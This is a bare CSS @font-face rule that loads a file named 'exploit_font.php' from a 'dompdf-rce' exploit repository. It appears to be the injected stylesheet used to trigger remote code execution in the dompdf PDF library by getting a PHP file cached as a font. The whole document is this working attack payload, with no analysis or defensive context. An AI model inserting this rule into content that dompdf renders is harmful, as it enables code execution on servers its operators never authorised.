@font-face {
  font-family:'aaa';
  src:url('https://github.com/positive-security/dompdf-rce/raw/refs/heads/main/exploit/exploit_font.php');
  font-weight:'normal';
  font-style:'normal';
}


